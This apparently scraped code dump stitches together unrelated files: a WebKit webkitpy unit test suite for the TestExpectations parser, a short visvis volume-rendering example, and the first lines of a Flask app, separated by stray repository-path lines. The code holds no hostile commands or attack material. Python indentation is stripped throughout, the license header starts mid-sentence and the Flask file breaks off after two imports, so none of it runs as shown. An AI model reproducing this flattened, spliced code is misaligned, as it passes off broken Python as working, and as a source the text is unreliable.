# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.common.host_mock import MockHost
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.layout_tests.models.test_configuration import *
from webkitpy.layout_tests.models.test_expectations import *
from webkitpy.layout_tests.models.test_configuration import *
try:
from collections import OrderedDict
except ImportError:
# Needed for Python < 2.7
from webkitpy.thirdparty.ordered_dict import OrderedDict
class Base(unittest.TestCase):
# Note that all of these tests are written assuming the configuration
# being tested is Windows XP, Release build.
def __init__(self, testFunc):
host = MockHost()
self._port = host.port_factory.get('test-win-xp', None)
self._exp = None
unittest.TestCase.__init__(self, testFunc)
def get_test(self, test_name):
# FIXME: Remove this routine and just reference test names directly.
return test_name
def get_basic_tests(self):
return [self.get_test('failures/expected/text.html'),
self.get_test('failures/expected/image_checksum.html'),
self.get_test('failures/expected/crash.html'),
self.get_test('failures/expected/missing_text.html'),
self.get_test('failures/expected/image.html'),
self.get_test('passes/text.html')]
def get_basic_expectations(self):
return """
Bug(test) failures/expected/text.html [ Failure ]
Bug(test) failures/expected/crash.html [ WontFix ]
Bug(test) failures/expected/missing_image.html [ Rebaseline Missing ]
Bug(test) failures/expected/image_checksum.html [ WontFix ]
Bug(test) failures/expected/image.html [ WontFix Mac ]
"""
def parse_exp(self, expectations, overrides=None, is_lint_mode=False):
expectations_dict = OrderedDict()
expectations_dict['expectations'] = expectations
if overrides:
expectations_dict['overrides'] = overrides
self._port.expectations_dict = lambda: expectations_dict
expectations_to_lint = expectations_dict if is_lint_mode else None
self._exp = TestExpectations(self._port, self.get_basic_tests(), expectations_to_lint=expectations_to_lint)
def assert_exp(self, test, result):
self.assertEqual(self._exp.get_expectations(self.get_test(test)),
set([result]))
def assert_bad_expectations(self, expectations, overrides=None):
self.assertRaises(ParseError, self.parse_exp, expectations, is_lint_mode=True, overrides=overrides)
class BasicTests(Base):
def test_basic(self):
self.parse_exp(self.get_basic_expectations())
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp('failures/expected/image_checksum.html', PASS)
self.assert_exp('passes/text.html', PASS)
self.assert_exp('failures/expected/image.html', PASS)
class MiscTests(Base):
def test_multiple_results(self):
self.parse_exp('Bug(x) failures/expected/text.html [ Crash Failure ]')
self.assertEqual(self._exp.get_expectations(
self.get_test('failures/expected/text.html')),
set([FAIL, CRASH]))
def test_result_was_expected(self):
# test basics
self.assertEqual(TestExpectations.result_was_expected(PASS, set([PASS]), test_needs_rebaselining=False, test_is_skipped=False), True)
self.assertEqual(TestExpectations.result_was_expected(FAIL, set([PASS]), test_needs_rebaselining=False, test_is_skipped=False), False)
# test handling of SKIPped tests and results
self.assertEqual(TestExpectations.result_was_expected(SKIP, set([CRASH]), test_needs_rebaselining=False, test_is_skipped=True), True)
self.assertEqual(TestExpectations.result_was_expected(SKIP, set([CRASH]), test_needs_rebaselining=False, test_is_skipped=False), False)
# test handling of MISSING results and the REBASELINE modifier
self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=True, test_is_skipped=False), True)
self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=False, test_is_skipped=False), False)
def test_remove_pixel_failures(self):
self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS])), set([PASS]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([IMAGE])), set([PASS]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS, IMAGE, CRASH])), set([PASS, CRASH]))
def test_suffixes_for_expectations(self):
self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL])), set(['txt', 'png', 'wav']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set([IMAGE])), set(['png']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL, IMAGE, CRASH])), set(['txt', 'png', 'wav']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set()), set())
def test_category_expectations(self):
        # This test checks that unknown tests are not present in the
        # expectations and that a known test that is part of a test category
        # is present in the expectations.
exp_str = 'Bug(x) failures/expected [ WontFix ]'
self.parse_exp(exp_str)
test_name = 'failures/expected/unknown-test.html'
unknown_test = self.get_test(test_name)
self.assertRaises(KeyError, self._exp.get_expectations,
unknown_test)
self.assert_exp('failures/expected/crash.html', PASS)
def test_get_modifiers(self):
self.parse_exp(self.get_basic_expectations())
self.assertEqual(self._exp.get_modifiers(
self.get_test('passes/text.html')), [])
def test_get_expectations_string(self):
self.parse_exp(self.get_basic_expectations())
self.assertEqual(self._exp.get_expectations_string(
self.get_test('failures/expected/text.html')),
'FAIL')
def test_expectation_to_string(self):
# Normal cases are handled by other tests.
self.parse_exp(self.get_basic_expectations())
self.assertRaises(ValueError, self._exp.expectation_to_string,
-1)
def test_get_test_set(self):
# Handle some corner cases for this routine not covered by other tests.
self.parse_exp(self.get_basic_expectations())
s = self._exp.get_test_set(WONTFIX)
self.assertEqual(s,
set([self.get_test('failures/expected/crash.html'),
self.get_test('failures/expected/image_checksum.html')]))
def test_parse_warning(self):
try:
filesystem = self._port.host.filesystem
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'disabled-test.html-disabled'), 'content')
self.get_test('disabled-test.html-disabled'),
self.parse_exp("[ FOO ] failures/expected/text.html [ Failure ]\n"
"Bug(rniwa) non-existent-test.html [ Failure ]\n"
"Bug(rniwa) disabled-test.html-disabled [ ImageOnlyFailure ]", is_lint_mode=True)
self.assertFalse(True, "ParseError wasn't raised")
except ParseError, e:
warnings = ("expectations:1 Unrecognized modifier 'foo' failures/expected/text.html\n"
"expectations:2 Path does not exist. non-existent-test.html")
self.assertEqual(str(e), warnings)
def test_parse_warnings_are_logged_if_not_in_lint_mode(self):
oc = OutputCapture()
try:
oc.capture_output()
self.parse_exp('-- this should be a syntax error', is_lint_mode=False)
finally:
_, _, logs = oc.restore_output()
self.assertNotEquals(logs, '')
def test_error_on_different_platform(self):
# parse_exp uses a Windows port. Assert errors on Mac show up in lint mode.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) [ Mac ] failures/expected/text.html [ Failure ]\nBug(test) [ Mac ] failures/expected/text.html [ Failure ]',
is_lint_mode=True)
def test_error_on_different_build_type(self):
# parse_exp uses a Release port. Assert errors on DEBUG show up in lint mode.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) [ Debug ] failures/expected/text.html [ Failure ]\nBug(test) [ Debug ] failures/expected/text.html [ Failure ]',
is_lint_mode=True)
def test_overrides(self):
self.parse_exp("Bug(exp) failures/expected/text.html [ Failure ]",
"Bug(override) failures/expected/text.html [ ImageOnlyFailure ]")
self.assert_exp('failures/expected/text.html', IMAGE)
def test_overrides__directory(self):
self.parse_exp("Bug(exp) failures/expected/text.html [ Failure ]",
"Bug(override) failures/expected [ Crash ]")
self.assert_exp('failures/expected/text.html', CRASH)
self.assert_exp('failures/expected/image.html', CRASH)
def test_overrides__duplicate(self):
self.assert_bad_expectations("Bug(exp) failures/expected/text.html [ Failure ]",
"Bug(override) failures/expected/text.html [ ImageOnlyFailure ]\n"
"Bug(override) failures/expected/text.html [ Crash ]\n")
def test_pixel_tests_flag(self):
def match(test, result, pixel_tests_enabled):
return self._exp.matches_an_expected_result(
self.get_test(test), result, pixel_tests_enabled)
self.parse_exp(self.get_basic_expectations())
self.assertTrue(match('failures/expected/text.html', FAIL, True))
self.assertTrue(match('failures/expected/text.html', FAIL, False))
self.assertFalse(match('failures/expected/text.html', CRASH, True))
self.assertFalse(match('failures/expected/text.html', CRASH, False))
self.assertTrue(match('failures/expected/image_checksum.html', PASS,
True))
self.assertTrue(match('failures/expected/image_checksum.html', PASS,
False))
self.assertTrue(match('failures/expected/crash.html', PASS, False))
self.assertTrue(match('passes/text.html', PASS, False))
def test_more_specific_override_resets_skip(self):
self.parse_exp("Bug(x) failures/expected [ Skip ]\n"
"Bug(x) failures/expected/text.html [ ImageOnlyFailure ]\n")
self.assert_exp('failures/expected/text.html', IMAGE)
self.assertFalse(self._port._filesystem.join(self._port.layout_tests_dir(),
'failures/expected/text.html') in
self._exp.get_tests_with_result_type(SKIP))
class SkippedTests(Base):
def check(self, expectations, overrides, skips, lint=False):
port = MockHost().port_factory.get('qt')
port._filesystem.write_text_file(port._filesystem.join(port.layout_tests_dir(), 'failures/expected/text.html'), 'foo')
expectations_dict = OrderedDict()
expectations_dict['expectations'] = expectations
if overrides:
expectations_dict['overrides'] = overrides
port.expectations_dict = lambda: expectations_dict
port.skipped_layout_tests = lambda tests: set(skips)
expectations_to_lint = expectations_dict if lint else None
exp = TestExpectations(port, ['failures/expected/text.html'], expectations_to_lint=expectations_to_lint)
# Check that the expectation is for BUG_DUMMY SKIP : ... [ Pass ]
self.assertEqual(exp.get_modifiers('failures/expected/text.html'),
[TestExpectationParser.DUMMY_BUG_MODIFIER, TestExpectationParser.SKIP_MODIFIER, TestExpectationParser.WONTFIX_MODIFIER])
self.assertEqual(exp.get_expectations('failures/expected/text.html'), set([PASS]))
def test_skipped_tests_work(self):
self.check(expectations='', overrides=None, skips=['failures/expected/text.html'])
def test_duplicate_skipped_test_fails_lint(self):
self.assertRaises(ParseError, self.check, expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None, skips=['failures/expected/text.html'], lint=True)
def test_skipped_file_overrides_expectations(self):
self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
skips=['failures/expected/text.html'])
def test_skipped_dir_overrides_expectations(self):
self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
skips=['failures/expected'])
def test_skipped_file_overrides_overrides(self):
self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
skips=['failures/expected/text.html'])
def test_skipped_dir_overrides_overrides(self):
self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
skips=['failures/expected'])
def test_skipped_entry_dont_exist(self):
port = MockHost().port_factory.get('qt')
expectations_dict = OrderedDict()
expectations_dict['expectations'] = ''
port.expectations_dict = lambda: expectations_dict
port.skipped_layout_tests = lambda tests: set(['foo/bar/baz.html'])
capture = OutputCapture()
capture.capture_output()
exp = TestExpectations(port)
_, _, logs = capture.restore_output()
self.assertEqual('The following test foo/bar/baz.html from the Skipped list doesn\'t exist\n', logs)
class ExpectationSyntaxTests(Base):
def test_unrecognized_expectation(self):
self.assert_bad_expectations('Bug(test) failures/expected/text.html [ Unknown ]')
def test_macro(self):
exp_str = 'Bug(test) [ Win ] failures/expected/text.html [ Failure ]'
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
def assert_tokenize_exp(self, line, bugs=None, modifiers=None, expectations=None, warnings=None, comment=None, name='foo.html'):
bugs = bugs or []
modifiers = modifiers or []
expectations = expectations or []
warnings = warnings or []
filename = 'TestExpectations'
line_number = 1
expectation_line = TestExpectationParser._tokenize_line(filename, line, line_number)
self.assertEqual(expectation_line.warnings, warnings)
self.assertEqual(expectation_line.name, name)
self.assertEqual(expectation_line.filename, filename)
self.assertEqual(expectation_line.line_number, line_number)
if not warnings:
self.assertEqual(expectation_line.modifiers, modifiers)
self.assertEqual(expectation_line.expectations, expectations)
def test_bare_name(self):
self.assert_tokenize_exp('foo.html', modifiers=['SKIP'], expectations=['PASS'])
def test_bare_name_and_bugs(self):
self.assert_tokenize_exp('webkit.org/b/12345 foo.html', modifiers=['BUGWK12345', 'SKIP'], expectations=['PASS'])
self.assert_tokenize_exp('Bug(dpranke) foo.html', modifiers=['BUGDPRANKE', 'SKIP'], expectations=['PASS'])
self.assert_tokenize_exp('webkit.org/b/12345 webkit.org/b/34567 foo.html', modifiers=['BUGWK12345', 'BUGWK34567', 'SKIP'], expectations=['PASS'])
def test_comments(self):
self.assert_tokenize_exp("# comment", name=None, comment="# comment")
self.assert_tokenize_exp("foo.html # comment", comment="# comment", expectations=['PASS'], modifiers=['SKIP'])
def test_config_modifiers(self):
self.assert_tokenize_exp('[ Mac ] foo.html', modifiers=['MAC', 'SKIP'], expectations=['PASS'])
self.assert_tokenize_exp('[ Mac Vista ] foo.html', modifiers=['MAC', 'VISTA', 'SKIP'], expectations=['PASS'])
self.assert_tokenize_exp('[ Mac ] foo.html [ Failure ] ', modifiers=['MAC'], expectations=['FAIL'])
def test_unknown_config(self):
self.assert_tokenize_exp('[ Foo ] foo.html ', modifiers=['Foo', 'SKIP'], expectations=['PASS'])
def test_unknown_expectation(self):
self.assert_tokenize_exp('foo.html [ Audio ]', warnings=['Unrecognized expectation "Audio"'])
def test_skip(self):
self.assert_tokenize_exp('foo.html [ Skip ]', modifiers=['SKIP'], expectations=['PASS'])
def test_slow(self):
self.assert_tokenize_exp('foo.html [ Slow ]', modifiers=['SLOW'], expectations=['PASS'])
def test_wontfix(self):
self.assert_tokenize_exp('foo.html [ WontFix ]', modifiers=['WONTFIX', 'SKIP'], expectations=['PASS'])
self.assert_tokenize_exp('foo.html [ WontFix ImageOnlyFailure ]', modifiers=['WONTFIX'], expectations=['IMAGE'])
self.assert_tokenize_exp('foo.html [ WontFix Pass Failure ]', modifiers=['WONTFIX'], expectations=['PASS', 'FAIL'])
def test_blank_line(self):
self.assert_tokenize_exp('', name=None)
def test_warnings(self):
self.assert_tokenize_exp('[ Mac ]', warnings=['Did not find a test name.'], name=None)
self.assert_tokenize_exp('[ [', warnings=['unexpected "["'], name=None)
self.assert_tokenize_exp('webkit.org/b/12345 ]', warnings=['unexpected "]"'], name=None)
self.assert_tokenize_exp('foo.html webkit.org/b/12345 ]', warnings=['"webkit.org/b/12345" is not at the start of the line.'])
class SemanticTests(Base):
def test_bug_format(self):
self.assertRaises(ParseError, self.parse_exp, 'BUG1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
def test_bad_bugid(self):
try:
self.parse_exp('BUG1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
self.fail('should have raised an error about a bad bug identifier')
except ParseError, exp:
self.assertEqual(len(exp.warnings), 1)
def test_missing_bugid(self):
self.parse_exp('failures/expected/text.html [ Failure ]')
self.assertFalse(self._exp.has_warnings())
self._port.warn_if_bug_missing_in_test_expectations = lambda: True
self.parse_exp('failures/expected/text.html [ Failure ]')
line = self._exp._model.get_expectation_line('failures/expected/text.html')
self.assertFalse(line.is_invalid())
self.assertEqual(line.warnings, ['Test lacks BUG modifier.'])
def test_skip_and_wontfix(self):
# Skip is not allowed to have other expectations as well, because those
        # expectations won't be exercised and may become stale.
self.parse_exp('failures/expected/text.html [ Failure Skip ]')
self.assertTrue(self._exp.has_warnings())
self.parse_exp('failures/expected/text.html [ Crash WontFix ]')
self.assertFalse(self._exp.has_warnings())
self.parse_exp('failures/expected/text.html [ Pass WontFix ]')
self.assertFalse(self._exp.has_warnings())
def test_slow_and_timeout(self):
# A test cannot be SLOW and expected to TIMEOUT.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) failures/expected/timeout.html [ Slow Timeout ]', is_lint_mode=True)
def test_rebaseline(self):
# Can't lint a file w/ 'REBASELINE' in it.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) failures/expected/text.html [ Failure Rebaseline ]',
is_lint_mode=True)
def test_duplicates(self):
self.assertRaises(ParseError, self.parse_exp, """
Bug(exp) failures/expected/text.html [ Failure ]
Bug(exp) failures/expected/text.html [ ImageOnlyFailure ]""", is_lint_mode=True)
self.assertRaises(ParseError, self.parse_exp,
self.get_basic_expectations(), overrides="""
Bug(override) failures/expected/text.html [ Failure ]
Bug(override) failures/expected/text.html [ ImageOnlyFailure ]""", is_lint_mode=True)
def test_missing_file(self):
self.parse_exp('Bug(test) missing_file.html [ Failure ]')
self.assertTrue(self._exp.has_warnings(), 1)
class PrecedenceTests(Base):
def test_file_over_directory(self):
# This tests handling precedence of specific lines over directories
# and tests expectations covering entire directories.
exp_str = """
Bug(x) failures/expected/text.html [ Failure ]
Bug(y) failures/expected [ WontFix ]
"""
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp('failures/expected/crash.html', PASS)
exp_str = """
Bug(x) failures/expected [ WontFix ]
Bug(y) failures/expected/text.html [ Failure ]
"""
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp('failures/expected/crash.html', PASS)
def test_ambiguous(self):
self.assert_bad_expectations("Bug(test) [ Release ] passes/text.html [ Pass ]\n"
"Bug(test) [ Win ] passes/text.html [ Failure ]\n")
def test_more_modifiers(self):
self.assert_bad_expectations("Bug(test) [ Release ] passes/text.html [ Pass ]\n"
"Bug(test) [ Win Release ] passes/text.html [ Failure ]\n")
def test_order_in_file(self):
self.assert_bad_expectations("Bug(test) [ Win Release ] : passes/text.html [ Failure ]\n"
"Bug(test) [ Release ] : passes/text.html [ Pass ]\n")
def test_macro_overrides(self):
self.assert_bad_expectations("Bug(test) [ Win ] passes/text.html [ Pass ]\n"
"Bug(test) [ XP ] passes/text.html [ Failure ]\n")
class RemoveConfigurationsTest(Base):
def test_remove(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {"expectations": """Bug(x) [ Linux Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port, self.get_basic_tests())
actual_expectations = expectations.remove_configuration_from_test('failures/expected/foo.html', test_config)
self.assertEqual("""Bug(x) [ Linux Vista Win7 Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configuration_from_test('failures/expected/foo.html', test_config)
actual_expectations = expectations.remove_configuration_from_test('failures/expected/foo.html', host.port_factory.get('test-win-vista', None).test_configuration())
actual_expectations = expectations.remove_configuration_from_test('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
class RebaseliningTest(Base):
"""Test rebaselining-specific functionality."""
def assertRemove(self, input_expectations, input_overrides, tests, expected_expectations, expected_overrides):
self.parse_exp(input_expectations, is_lint_mode=False, overrides=input_overrides)
actual_expectations = self._exp.remove_rebaselined_tests(tests, 'expectations')
self.assertEqual(expected_expectations, actual_expectations)
actual_overrides = self._exp.remove_rebaselined_tests(tests, 'overrides')
self.assertEqual(expected_overrides, actual_overrides)
def test_remove(self):
self.assertRemove('Bug(x) failures/expected/text.html [ Failure Rebaseline ]\n'
'Bug(y) failures/expected/image.html [ ImageOnlyFailure Rebaseline ]\n'
'Bug(z) failures/expected/crash.html [ Crash ]\n',
'Bug(x0) failures/expected/image.html [ Crash ]\n',
['failures/expected/text.html'],
'Bug(y) failures/expected/image.html [ ImageOnlyFailure Rebaseline ]\n'
'Bug(z) failures/expected/crash.html [ Crash ]\n',
'Bug(x0) failures/expected/image.html [ Crash ]\n')
# Ensure that we don't modify unrelated lines, even if we could rewrite them.
# i.e., the second line doesn't get rewritten to "Bug(y) failures/expected/skip.html"
self.assertRemove('Bug(x) failures/expected/text.html [ Failure Rebaseline ]\n'
'Bug(Y) failures/expected/image.html [ Skip ]\n'
'Bug(z) failures/expected/crash.html\n',
'',
['failures/expected/text.html'],
'Bug(Y) failures/expected/image.html [ Skip ]\n'
'Bug(z) failures/expected/crash.html\n',
'')
def test_get_rebaselining_failures(self):
# Make sure we find a test as needing a rebaseline even if it is not marked as a failure.
self.parse_exp('Bug(x) failures/expected/text.html [ Rebaseline ]\n')
self.assertEqual(len(self._exp.get_rebaselining_failures()), 1)
self.parse_exp(self.get_basic_expectations())
self.assertEqual(len(self._exp.get_rebaselining_failures()), 0)
class TestExpectationSerializationTests(unittest.TestCase):
def __init__(self, testFunc):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
self._converter = TestConfigurationConverter(test_port.all_test_configurations(), test_port.configuration_specifier_macros())
unittest.TestCase.__init__(self, testFunc)
def _tokenize(self, line):
return TestExpectationParser._tokenize_line('path', line, 0)
def assert_round_trip(self, in_string, expected_string=None):
expectation = self._tokenize(in_string)
if expected_string is None:
expected_string = in_string
self.assertEqual(expected_string, expectation.to_string(self._converter))
def assert_list_round_trip(self, in_string, expected_string=None):
host = MockHost()
parser = TestExpectationParser(host.port_factory.get('test-win-xp', None), [], allow_rebaseline_modifier=False)
expectations = parser.parse('path', in_string)
if expected_string is None:
expected_string = in_string
self.assertEqual(expected_string, TestExpectations.list_to_string(expectations, self._converter))
def test_unparsed_to_string(self):
expectation = TestExpectationLine()
self.assertEqual(expectation.to_string(self._converter), '')
expectation.comment = ' Qux.'
self.assertEqual(expectation.to_string(self._converter), '# Qux.')
expectation.name = 'bar'
self.assertEqual(expectation.to_string(self._converter), 'bar # Qux.')
expectation.modifiers = ['foo']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar # Qux.')
expectation.expectations = ['bAz']
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ ] # Qux.')
expectation.expectations = ['bAz1', 'baZ2']
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ1 BAZ2 ] # Qux.')
expectation.modifiers = ['foo1', 'foO2']
self.assertEqual(expectation.to_string(self._converter), '[ FOO1 FOO2 ] bar [ BAZ1 BAZ2 ] # Qux.')
expectation.warnings.append('Oh the horror.')
self.assertEqual(expectation.to_string(self._converter), '')
expectation.original_string = 'Yes it is!'
self.assertEqual(expectation.to_string(self._converter), 'Yes it is!')
def test_unparsed_list_to_string(self):
expectation = TestExpectationLine()
expectation.comment = 'Qux.'
expectation.name = 'bar'
expectation.modifiers = ['foo']
expectation.expectations = ['bAz1', 'baZ2']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(TestExpectations.list_to_string([expectation]), '[ FOO ] bar [ BAZ1 BAZ2 ] #Qux.')
def test_parsed_to_string(self):
expectation_line = TestExpectationLine()
expectation_line.parsed_bug_modifiers = ['BUGX']
expectation_line.name = 'test/name/for/realz.html'
expectation_line.parsed_expectations = set([IMAGE])
self.assertEqual(expectation_line.to_string(self._converter), None)
expectation_line.matching_configurations = set([TestConfiguration('xp', 'x86', 'release')])
self.assertEqual(expectation_line.to_string(self._converter), 'Bug(x) [ XP Release ] test/name/for/realz.html [ ImageOnlyFailure ]')
expectation_line.matching_configurations = set([TestConfiguration('xp', 'x86', 'release'), TestConfiguration('xp', 'x86', 'debug')])
self.assertEqual(expectation_line.to_string(self._converter), 'Bug(x) [ XP ] test/name/for/realz.html [ ImageOnlyFailure ]')
def test_serialize_parsed_expectations(self):
expectation_line = TestExpectationLine()
expectation_line.parsed_expectations = set([])
parsed_expectation_to_string = dict([[parsed_expectation, expectation_string] for expectation_string, parsed_expectation in TestExpectations.EXPECTATIONS.items()])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), '')
expectation_line.parsed_expectations = set([FAIL])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'fail')
expectation_line.parsed_expectations = set([PASS, IMAGE])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'pass image')
expectation_line.parsed_expectations = set([FAIL, PASS])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'pass fail')
def test_serialize_parsed_modifier_string(self):
expectation_line = TestExpectationLine()
expectation_line.parsed_bug_modifiers = ['garden-o-matic']
expectation_line.parsed_modifiers = ['for', 'the']
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, []), 'garden-o-matic for the')
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, ['win']), 'garden-o-matic for the win')
expectation_line.parsed_bug_modifiers = []
expectation_line.parsed_modifiers = []
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, []), '')
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, ['win']), 'win')
expectation_line.parsed_bug_modifiers = ['garden-o-matic', 'total', 'is']
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, ['win']), 'garden-o-matic is total win')
expectation_line.parsed_bug_modifiers = []
expectation_line.parsed_modifiers = ['garden-o-matic', 'total', 'is']
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, ['win']), 'garden-o-matic is total win')
def test_format_line(self):
self.assertEqual(TestExpectationLine._format_line(['MODIFIERS'], 'name', ['EXPECTATIONS'], 'comment'), '[ MODIFIERS ] name [ EXPECTATIONS ] #comment')
self.assertEqual(TestExpectationLine._format_line(['MODIFIERS'], 'name', ['EXPECTATIONS'], None), '[ MODIFIERS ] name [ EXPECTATIONS ]')
def test_string_roundtrip(self):
self.assert_round_trip('')
self.assert_round_trip('FOO')
self.assert_round_trip('[')
self.assert_round_trip('FOO [')
self.assert_round_trip('FOO ] bar')
self.assert_round_trip(' FOO [')
self.assert_round_trip(' [ FOO ] ')
self.assert_round_trip('[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] ] ] bar BAZ')
self.assert_round_trip('[ FOO ] ] ] bar [ BAZ ]')
self.assert_round_trip('FOO ] ] bar ==== BAZ')
self.assert_round_trip('=')
self.assert_round_trip('#')
self.assert_round_trip('# ')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo :')
self.assert_round_trip('# Foo : =')
def test_list_roundtrip(self):
self.assert_list_round_trip('')
self.assert_list_round_trip('\n')
self.assert_list_round_trip('\n\n')
self.assert_list_round_trip('bar')
self.assert_list_round_trip('bar\n# Qux.')
self.assert_list_round_trip('bar\n# Qux.\n')
def test_reconstitute_only_these(self):
lines = []
reconstitute_only_these = []
def add_line(matching_configurations, reconstitute):
expectation_line = TestExpectationLine()
expectation_line.original_string = "Nay"
expectation_line.parsed_bug_modifiers = ['BUGX']
expectation_line.name = 'Yay'
expectation_line.parsed_expectations = set([IMAGE])
expectation_line.matching_configurations = matching_configurations
lines.append(expectation_line)
if reconstitute:
reconstitute_only_these.append(expectation_line)
add_line(set([TestConfiguration('xp', 'x86', 'release')]), True)
add_line(set([TestConfiguration('xp', 'x86', 'release'), TestConfiguration('xp', 'x86', 'debug')]), False)
serialized = TestExpectations.list_to_string(lines, self._converter)
self.assertEqual(serialized, "Bug(x) [ XP Release ] Yay [ ImageOnlyFailure ]\nBug(x) [ XP ] Yay [ ImageOnlyFailure ]")
serialized = TestExpectations.list_to_string(lines, self._converter, reconstitute_only_these=reconstitute_only_these)
self.assertEqual(serialized, "Bug(x) [ XP Release ] Yay [ ImageOnlyFailure ]\nNay")
def disabled_test_string_whitespace_stripping(self):
# FIXME: Re-enable this test once we rework the code to no longer support the old syntax.
self.assert_round_trip('\n', '')
self.assert_round_trip(' [ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
|
pbfy0/visvis.dev
|
refs/heads/master
|
examples/volumes.py
|
8
|
#!/usr/bin/env python
import visvis as vv
import numpy as np
app = vv.use()
vv.clf()
# create volume
vol = vv.aVolume(size=64)
# set labels
vv.xlabel('x axis')
vv.ylabel('y axis')
vv.zlabel('z axis')
# show
t = vv.volshow(vol, renderStyle='mip')
# Try the different render styles, for example
# "t.renderStyle='iso'" or "t.renderStyle='ray'".
# If the drawing hangs, your video driver decided to render in software mode.
# This is unfortunately (as far as I know) not possible to detect.
# It might help if your data is shaped as a power of 2.
# Get axes and set the camera field of view to 45 degrees
a = vv.gca()
a.camera.fov = 45
# Create colormap editor wibject.
vv.ColormapEditor(a)
# Start app
app.Run()
|
DFoly/Blogg
|
refs/heads/master
|
app/__init__.py
|
5
|
from flask import Flask
from flask_bootstrap import Bootstrap
